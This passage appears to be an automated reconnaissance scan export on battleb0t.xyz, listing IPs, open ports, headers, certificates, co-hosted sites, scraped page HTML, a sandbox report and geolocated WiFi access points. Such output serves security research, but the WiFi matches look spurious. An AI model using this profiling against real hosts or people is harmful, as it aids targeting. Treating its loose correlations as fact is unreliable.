d: 'FoAd4lVBdR3won9Rs2Jfak+tQjzXxPoSuo1RDbLWoBgbDtG4sbp6dJPVY2yPACeJPMILVDmGpWRL5p83JUdrP8nuVYCG+5vbYX8rd53MVZ5kJ9wlfWFmCqWwQJUw/8TZawBHID/u/30DQeOeSeUTm1hqzmleggywIwf6pMg+ibTI90WBrTuW9wSkueaL3qTaSW+A5NmE5a98IBe6uITwE7298cOlvN5xe0V0Y44L/7J794Ti/d2obzW0EWmpSj68DzdMrP78juCknmUCL5iCtrWXrfhdXXjruJCYgBsuVR5T1HoPLAY8ZaUH61xukMd5qVzPRfNIIlhcoowZA1Eh2PMRByvPcFpdrPeDKOY1J+M5l4lk4/TNmiDkgCFAka0tLoM1HisA+wo47P0wfWILTScPL+M3MhFjnCEsQgVWbbbcu7ppiHsxevxnn0ypjrb3lrjH9FQcH522PtO7okA/1k5zFXRELcMaZ1PaWlYYxUzZ0lEDuGD8W2uAABd3Zqr48isKkErgxdWRypRiannuzpfhTo9gXIVZgjYXWZqPwNgKEtOvG48uUqTLWAhuTpBS',
t: 'MTY4Mzg2MTg2MS40MTQwMDA=',
m: 'cETLdgv65AVfRnLUKPe0Cd6r3wJgEhjfW5wAN2YKd/o=',
i1: 'w+O5Ul3LVrlFQJyL4ELS5Q==',
i2: 'eUom9RfWfCbkQbM7K2vx8A==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c59d97743e3');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c59d97743e3';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GOAT (Net ID: 00:00:C5:D3:87:1C) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.71.14 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:80 | 87.248.157.102 |
| 2023-05-12 03:09:51 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 4 | 0 | None | keyubu.com | dgn.keyubu.com |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:33:68:61) | 39.0469, -77.4903 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Google Trust Services LLC,CN=GTS CA 1P5 | battleb0t.xyz |
| 2023-05-12 02:46:50 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.74.170.74 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/carti_2.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PLXDevices (Net ID: 00:06:66:30:03:AC) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:02:57 | Web Analytics ID | No | Web Analytics Extractor | 0 | 0 | 3 | 0 | None | Google Analytics: UA-105392568-1 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
.promo {
display: none;
/* display: table; */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
overflow: auto;
color: lightblue;
background-color: rgba(0,0,0,0.4);
animation: promo-appear-animation 0.35s ease-out;
}
.promo-middle {
display: table-cell;
vertical-align: middle;
}
.promo-content {
width: 80vw;
height: 80vh;
max-width: 80vh;
max-height: 80vw;
margin: auto;
padding: 0;
font-size: 2.8vmax;
font-family: Futura, "Trebuchet MS", Arial, sans-serif;
text-align: center;
background-image: url("promo_back.png");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
border-radius: 15px;
box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
}
.promo-header {
height: 10%;
padding: 2px 16px;
}
.promo-close {
width: 10%;
height: 100%;
text-align: left;
float: left;
font-size: 1.3em;
/* transition: 0.2s; */
}
.promo-close:hover {
/* transform: scale(1.25); */
cursor: pointer;
}
.promo-body {
padding: 8px 16px 16px 16px;
margin: auto;
}
.promo-body p {
margin-top: 0;
mix-blend-mode: color-dodge;
}
.link {
width: 100%;
display: inline-block;
}
.link img {
width: 100%;
}
@keyframes promo-appear-animation {
0% {
transform: scale(2.0);
opacity: 0;
}
100% {
transform: scale(1.0);
opacity: 1;
}
}
</style>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-105392568-1', 'auto');
ga('send', 'pageview');
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
</head>
<body>
<canvas></canvas>
<!-- Mother of God, pls forgive me -->
<div class="promo">
<div class="promo-middle">
<div class="promo-content">
<div class="promo-header">
<span class="promo-close">×</span>
</div>
<div class="promo-body">
<p>Try Fluid Simulation app!</p>
<div class="links-container">
<a class="link" id="apple_link" target="_blank">
<img class="link-img" alt="Download on the App Store" src="app_badge.png"/>
</a>
<a class="link" id="google_link" target="_blank">
<img class="link-img" alt="Get it on Google Play" src="gp_badge.png"/>
</a>
</div>
</div>
</div>
</div>
</div>
<script src="./script.js"></script>
</body>
</html> |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:41:40:58) | 39.0469, -77.4903 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 4 | 0 | None | English | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>vscode.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:21 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">vscode.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f606679610ce9</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:23:50 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.20:443 | 188.114.96.0/24 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.79): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Netherlands | Eygelshoven, Limburg, 6471, Netherlands, Europe |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | y?maz mef. (Net ID: 00:12:BF:D2:A8:62) | 40.2024, 29.0398 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007sair.github.io | 185.199.111.153 |
| 2023-05-12 02:58:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.148.97.127', u'104.16.89.20', u'104.21.63.54', u'23.59.114.103'], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://www.trustsign.com.br/contact', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "o.ss2.us"\n "crl.rootg2.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "crls.pki.goog"\n "crl.pki.goog"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"\n "142.250.217.72:443"\n "142.250.217.106:443"\n "108.139.0.36:443"\n "104.16.89.20:443"\n "104.21.63.54:443"\n "142.250.217.99:80"\n "108.138.245.91:80"\n "108.138.245.183:80"\n "108.138.245.30:80"\n "142.251.33.110:80"\n "108.139.0.15:80"\n "108.139.0.178:80"\n "142.251.211.238:443"\n "142.250.217.99:443"\n "142.250.69.195:443"\n "23.59.114.103:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1AFD.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a10_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a10_IESQMMUTEX_0_519"\n "IsoScope_a10_IESQMMUTEX_0_303"\n "IsoScope_a10_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2576"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_a10_IE_EarlyTabStart_0x988_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2576"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00002224]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002576]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002224]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00002224]\n "_F5550ABA-2D97-11ED-A45D-0800272D826D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "MI7W09W0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MI7W09W0.txt]- [targetUID: 00000000-00002576]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00002224]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00002224]\n "memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWVAexg_1_.woff" has type "Web Open Font Format TrueType length 21856 version 1.1"- [targetUID: N/A]\n "analytics_3_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "DSG5QH9T.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DSG5QH9T.txt]- [targetUID: 00000000-00002224]\n "ce5327c52694093aede79fbdda65cf4496210956_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "jquery-3.1.0.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "E87CE99F124623F95572A696C80EFCAF_FED996F91E5E7B003162E0E8C3911D16" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E87CE99F124623F95572A696C80EFCAF_FED996F91E5E7B003162E0E8C3911D16]- [targetUID: 00000000-00002224]\n "Tar1AFD.tmp" has type "data"- Location: [%TEMP%\\Tar1AFD.tmp]- [targetUID: 00000000-00002224]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'API Call', u'identifier': u'api-113', u'name': u'Touches files in program files directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\iexplore.exe.config"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE.LOCAL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\DWMAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\SECUR32.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\CRYPTSP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\RPCRTREMOTE.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Microsoft Office\\Office14\\GROOVEEX.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\DNSAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\RASADHLP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\iexplore.exe"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\EN\\IEXPLORE.EXE.MUI"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEUI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\CREDSSP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\NCRYPT.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\WINHTTP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\WEBIO.DLL"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /contact HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: www.trustsign.com.br\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_34.148.97.127]\n\n "GET /contact/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: www.trustsign.com.br\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_34.148.97.127]\n\n "a84\nY[o~0(donHfsiS,6A]E0$Iwf(m}[_zfxuqMZleX3|~5 + )U(K/\'_GM~) W4!s-<I<izX(m#\nV(B])RlAiyjoh8Mo-nEmXQEw p_7e*so8E)WT$egnw-{$\nyNm<Yw{;@{e^RpE^s+,5MVdamXV,\\ReHS%_~(zaF`xVPpk|6Uy%J.Y[7,!EOiX*j=[Z[=,J7k[;5b!k-B)wy9~flTw)jtekDD|:a(AAGH\na<LBYDa<A}j{n~C)Ar~k\nWj>\nf_}\\]wYK#\'\ncy.\\)]qq]qd_Qc$30B-M"8ZI\\\\<^dUSI"q}4EW1e&i | 34.148.97.127 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d9:29:5b:18:4c:1d:e8:59:eb:db:25:91:54:31:
ed:38:23:ab:0a:88:57:5c:ef:0c:7e:ca:ca:6c:71:
0b:02:fd:19:3d:6a:e8:97:28:77:25:12:e6:41:af:
